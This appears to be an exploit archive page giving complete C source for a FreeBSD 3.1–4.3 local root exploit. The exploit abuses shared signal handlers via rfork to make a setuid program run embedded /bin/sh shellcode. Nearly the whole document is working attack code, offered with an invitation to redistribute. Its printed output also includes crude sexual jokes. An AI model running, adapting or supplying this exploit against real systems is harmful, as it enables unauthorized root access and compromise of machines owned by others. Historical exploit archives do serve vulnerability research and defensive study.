FreeBSD 3.1 - 4.3 local root exploit - Uses the signal condition vulnerability discovered by G. Guninski.
877ecb999c4cc6e021713bc69df6e18a70c93bcd73f813c5488ecc59bcd1edb6/*
* -//--//--//--//--//--//--//--//--//--//--//--//--//-
*
* fbsd 3.1-4.3 signal condition coded by lamerboy.
* found by G.Guninsky - thnx man, u so leeet! =)
* written after SA-01:42 released, for testing purpose
* ( and for phun cuz ).
*
* THIS CODE IS BEER-WARE LICENSED WITH ONE EXCEPTION:
* REDISTRIBUTION IN ANY FORM IS HIGHLY RECOMMENDED !
*
* -//--//--//--//--//--//--//--//--//--//--//--//--//-
*/
#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>
#include <signal.h>
#include <strings.h>
char shell[]=
"\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80\x00"; /* thnx preedator */
static struct sigaction sa;
static pid_t pid;
extern char **environ;
int
main (int argc, char **argv) {
char *file = NULL, *addr = NULL;
if (argc<2) {
printf("%s suid_prog\n", argv[0]);
exit(1);
}
file = strdup(argv[1]);
addr = getenv("CODE");
if (!addr) {
printf("hot hot chikz love icecream...\n");
printf("hot hot chikz love cool beer...\n");
printf("hot hot chikz love oral sex...\n");
printf("l33t l33t h4x0rz love have phun...\n");
printf("l33t l33t h4x0rz love G.Guninsky splotz...\n");
printf("thank you much man! you so l33t!\n\n");
setenv("CODE",shell,1);
execle(argv[0],file,file,0,environ);
}
printf("h0h0h0, addr = %p\n",addr);
memset(&sa,0,sizeof(struct sigaction));
sa.sa_handler = addr;
pid = rfork(RFPROC|RFFDG|RFSIGSHARE);
if (pid == 0) {
sleep(3);
sigaction(SIGUSR2,&sa,0);
kill(getppid(),SIGUSR2);
} else {
sleep(1);
execle(file,file,0,environ);
}
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed